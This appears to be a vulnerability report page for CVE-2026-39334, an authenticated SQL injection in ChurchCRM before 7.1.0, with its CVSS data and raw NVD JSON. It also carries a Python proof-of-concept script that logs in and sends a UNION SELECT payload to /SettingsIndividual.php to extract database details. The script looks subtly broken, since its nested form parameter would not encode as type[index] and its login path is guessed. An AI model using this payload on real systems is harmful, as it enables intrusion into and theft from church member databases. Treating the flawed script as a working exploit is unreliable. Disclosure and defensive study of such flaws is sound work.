Security Vulnerability Report
中文
CVE-2026-39334 CVSS 8.8 HIGH

CVE-2026-39334

Published: 2026-04-07 18:16:45
Last Modified: 2026-04-10 20:57:48
Source: [email protected]

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /SettingsIndividual.php in ChurchCRM 7.0.5. Authenticated users without any specific privileges can inject arbitrary SQL statements through the type array parameter via the index and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_sqli(target_url, username, password): """ PoC for CVE-2026-39334: SQL Injection in ChurchCRM < 7.1.0 Vulnerable Endpoint: /SettingsIndividual.php Parameter: type[index] """ session = requests.Session() # Step 1: Authenticate login_url = f"{target_url}/login" login_payload = { "User": username, "Password": password } session.post(login_url, data=login_payload) # Step 2: Send malicious payload exploit_url = f"{target_url}/SettingsIndividual.php" # Injecting a simple UNION SELECT payload to extract database version malicious_payload = { "type": { "index": "1' UNION SELECT NULL, user(), database(), version()-- -" } } response = session.post(exploit_url, data=malicious_payload) if response.status_code == 200: print("[+] Potential SQL Injection successful!") print("[+] Response:") print(response.text) else: print("[-] Exploit failed or WAF blocked.") if __name__ == "__main__": target = "http://localhost:8080" # Replace with actual target user = "testuser" pwd = "password" exploit_sqli(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39334", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:45.140", "lastModified": "2026-04-10T20:57:47.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, an SQL injection vulnerability was found in the endpoint /SettingsIndividual.php in ChurchCRM 7.0.5. Authenticated users without any specific privileges can inject arbitrary SQL statements through the type array parameter via the index and thus extract and modify information from the database. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-8g53-72jr-39w6", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-8g53-72jr-39w6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.